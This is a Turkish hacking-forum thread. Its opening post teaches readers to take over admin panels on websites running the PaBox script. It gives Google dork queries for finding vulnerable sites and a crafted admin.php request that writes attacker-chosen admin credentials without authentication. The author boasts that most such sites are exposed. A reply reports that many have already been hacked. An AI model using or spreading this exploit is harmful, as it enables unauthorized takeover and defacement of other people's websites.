PaBox Panel’de Admin Olmak (PaBox Admin Panel Vulnerable)

alperonline

Katılımcı Üye
22 Ara 2006
463
13
Adana
PaBox Admin Panel Vulnerable

Sizlere PaBox Panel’de Admin olmaktan bahsedeceğim.Bu Açığı Kapatan Siteler %30 u geçmez yani %70 i bizim demektir.Ben şahsen denedim
smile.gif
.

İlk önce En büyük yardımcımız olan Google dan başlayalım.Burda dikkat etmeniz gereken bir husus bu scriptin ana sayfasının index.php yerine thebox.php olması... ve çoğunlukla da thebox klasöründe bulunmaktadır.

inurl:thebox/thebox.php

inurl:thebox/admin.php

intitle:paBox Admin Panel

...

Sadece bu verdiklerim ile yetinmeyin kendiniz de bir şeyler yapın mesela sonlarına site:il... şeklinde ekleyip ülkesini, belirtebilirsiniz...

Sitemizi bulduk

https://tik.lat/NMSR1

Burada görmüş olduğunuz

/thebox.php yerine

/admin.php?act=write&username=Z@M@N&password=Hacker &aduser=Z@M@N&adpass=Hacker

yazıyoruz daha sonra 2 defa yönlendirme(Yönlendirmede beklememek için linklere tıklayın ) çıkacak ve bizi admin paneline yönlendircek.

DAha önce benzeri verilmişti ama aynısı değil thebox açığıydı neyse benim canım saolsun ;)

trabzonluhamza

Yeni üye
8 Eki 2007
12
0
Sagol kardeş güzel paylaşım ama bu acık kapatildi cok az site kaldı bu aciğa sahip olanlarinda hepsini hacklemişler emegine saglık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.